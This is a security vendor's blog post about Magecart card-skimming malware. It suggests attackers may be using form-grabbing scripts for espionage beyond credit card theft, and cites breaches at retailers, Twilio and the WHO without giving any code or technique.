Masquerading as Card-Skimmers: Are Attackers Doing More with Magecart?

E-commerce, Shopping online.

While Magecart is well known as a malware hacking groups use to inject card-skimming scripts into e-commerce platforms, Prevailion researchers have detected many compromises with Magecart that suggest the malicious actors are not actually going after credit card data. 

According to public data breach records, the credit card information of organizations from British Airways to NutriBullet, Tupperware, easyJet and Macy’s has been targeted in different card-skimming campaigns.  In July 2019, attackers leveraged a vulnerability in the e-commerce software platform Magento, which left more than 960 online retailers compromised in a single digital skimming campaign. 

Earlier this year, card-skimming groups began attacking industry verticals, going after the education sector. Parents and students found themselves victims of Magecart actors who exploited Blue Bear Software, “an administration and e-commerce platform for K-12 schools and other educational institutions,” according to Threatpost.

Beware the Three-Headed Dog

In large part, Magecart has been seen as a threat to online retailers, but this recent shift in targets suggests that the group’s objectives could be evolving. The car-skimming script has been used to steal credit card information during the checkout process by masquerading as payment forms, but the malicious script can be used to capture any submitted information, suggesting that it is likely being deployed within organizations for other purposes.

Recently, Twilio, a cloud communications company, suffered a breach that initially,  “resembled a Magecart-style attack that skims websites for users’ financial data,” Cyber Scoop reported. Though Twilio, “cleaned up the code hours later, and said there was no sign the attackers had accessed customer data,” the larger concern is that the attackers had access to the code. 

Once an organization is compromised by exploiting any attack vector, adversaries can linger undetected. When those actors are not financially motivated–which is often the case for nation state hackers–they are after more sensitive data. Of greater concern is that they are patient enough to take the time to find it. A network that is porous enough to be infiltrated and exfiltrated, is all too often unaware of the communication coming from the inside that is being sent out to the open web.

Speculation and the Reality of Human Risk

Recently, Prevailion’s cyberintelligence was able to identify Magecart malware in the World Health Organization’s network. When a global organization, such as WHO, collects and stores that much sensitive data, they are a target for malicious actors around the globe. The reality is, few users are visiting the WHO and making credit card purchases, which leads us to believe that this form-grabbing malware (able to capture any data entered into an online form) is being leveraged for more nefarious attacks. Though commodity malware is often underappreciated for its potential as a tool for APT groups, Prevailion’s Apex Platform tracks many other instances where it has indeed been deployed by APTs.

Prevailion’s CEO Karim Hijazi explained to Fox News, “This type of infection within the WHO network could be used to hack other organizations who visit the site — or any partners/registrants who are using the site to fill out forms and submit information or make requests.”. 

Breached organizations continue to make headlines because they rely too much on security tools that don’t have visibility into real threats. The risk from human error is real and has an enormous impact on the business and its victims, and nation state adversaries are highly motivated. 

The Latest

How Vulnerable Are America’s Utilities?

Undoubtedly, news that a Florida water plant had been hacked raised a lot of alarms outside the cybersecurity industry. The idea that a water source could be contaminated hit home for many Americans, highlighting the vulnerability of the nation’s utilities and critical infrastructure. But this attack came as no surprise to security experts. It was […]

Why Corporate Hacks Go Unreported

Despite the many regulations from GDPR to CCPA, HIPAA, and PCI DSS that mandate a company report a data breach, many corporate hacks go unreported. Certainly, compliance is a driving force for the organizations that do report a data breach. Still, in 2019, CSO Online reported that the FBI’s Internet Crime Complaint Center received reports […]

Keep Ramnit on Your Radar

Over a decade ago, security researchers at Microsoft identified a computer worm and dubbed it Ramnit. The malware family, “infects Windows executable files (.EXE) and HTML files (.HTML). It can also give a malicious hacker access to your PC. It spreads through infected removable drives, such as USB flash drives,” Microsoft warned.  Fast forward to […]

Copyright 2021 Prevailion, Inc. All rights reserved.    

Disclaimer: Gartner “Cool Vendors in Security Operations and Threat Intelligence,” Mitchell Schneider, Ruggero Contu, John Watts, Craig Lawson, October 13, 2020. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved. Gartner Disclaimer: The GARTNER COOL VENDOR badge is a trademark and service mark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s Research & Advisory organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.